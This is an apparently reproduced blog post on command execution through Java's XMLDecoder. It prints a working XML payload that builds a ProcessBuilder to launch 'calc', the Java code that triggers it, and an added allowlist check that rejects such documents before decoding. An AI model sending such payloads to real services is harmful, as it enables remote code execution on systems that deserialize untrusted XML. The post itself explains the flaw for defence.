Parsing an XML file with Java's java.beans.XMLDecoder is vulnerable to command execution: the decoder instantiates whatever classes the document names and calls the methods it specifies.
A sample XML file is shown below:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_131" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start"/>
    </object>
</java>
```
The corresponding Java code is shown below:
```java
package xmldecoder;

import java.io.BufferedInputStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;

public class XmlDecoderTest {

    public static void main(String[] args) {
        // The XML document shown above, stored on disk
        java.io.File file = new java.io.File("d:/tmp/xmldecoder.xml");
        java.beans.XMLDecoder xd = null;
        try {
            xd = new java.beans.XMLDecoder(new BufferedInputStream(new FileInputStream(file)));
        } catch (FileNotFoundException e) {
            e.printStackTrace();
            return; // nothing to decode (the original fell through and dereferenced null here)
        }
        // readObject() instantiates java.lang.ProcessBuilder and calls start(), as the XML directs
        Object s2 = xd.readObject();
        xd.close();
    }
}
```
The execution result is shown below:
[screenshot from the original post; not preserved in this copy]
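XMLDecoder has no built-in class filter, so the practical mitigation is to never feed it untrusted input or, where decoding cannot be avoided, to allowlist the classes a document may name before the decoder ever sees it. The following is an added example, not code from the original post: it pre-checks a document with a DOM parser (DTDs disabled) and runs that check over a constructed copy of the payload above and over a benign document; the names XmlDecoderGuard and isSafeForXmlDecoder and the allowlist contents are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.Collections;
import java.util.Set;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;

public class XmlDecoderGuard {
    // Hypothetical allowlist; keep it minimal, since XMLDecoder can still call any public method or setter of an allowed class
    static final Set<String> ALLOWED = Collections.singleton("java.lang.String");

    // True only if every "class" attribute outside the <java> root names an allowlisted class
    static boolean isSafeForXmlDecoder(byte[] xml) throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); // no DTD, so no XXE
        Document doc = dbf.newDocumentBuilder().parse(new ByteArrayInputStream(xml));
        NodeList all = doc.getElementsByTagName("*");
        for (int i = 0; i < all.getLength(); i++) {
            Element e = (Element) all.item(i);
            if (e == doc.getDocumentElement()) continue; // root's class="java.beans.XMLDecoder" names the decoder itself
            String cls = e.getAttribute("class");        // "" when the element carries no class attribute
            if (!cls.isEmpty() && !ALLOWED.contains(cls)) return false;
        }
        return true;
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples: the ProcessBuilder payload from the post, and a harmless string document
        String hostile = "<java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\">"
            + "<object class=\"java.lang.ProcessBuilder\"><array class=\"java.lang.String\" length=\"1\">"
            + "<void index=\"0\"><string>calc</string></void></array><void method=\"start\"/></object></java>";
        String benign = "<java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\"><string>hello</string></java>";
        for (String text : new String[] {hostile, benign}) {
            byte[] bytes = text.getBytes(StandardCharsets.UTF_8);
            if (!isSafeForXmlDecoder(bytes)) {
                System.out.println("rejected: document names a class outside the allowlist");
                continue; // never reaches XMLDecoder, so ProcessBuilder.start() is never invoked
            }
            try (java.beans.XMLDecoder xd = new java.beans.XMLDecoder(new ByteArrayInputStream(bytes))) {
                System.out.println("decoded: " + xd.readObject());
            }
        }
    }
}
```

The hostile document is rejected because `<object class="java.lang.ProcessBuilder">` is not allowlisted, while the benign one decodes to the string `hello`.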
This article is reproduced from fatshi's 51CTO blog; original link: http://blog.51cto.com/duallay/1961598. Contact the original author for permission to republish.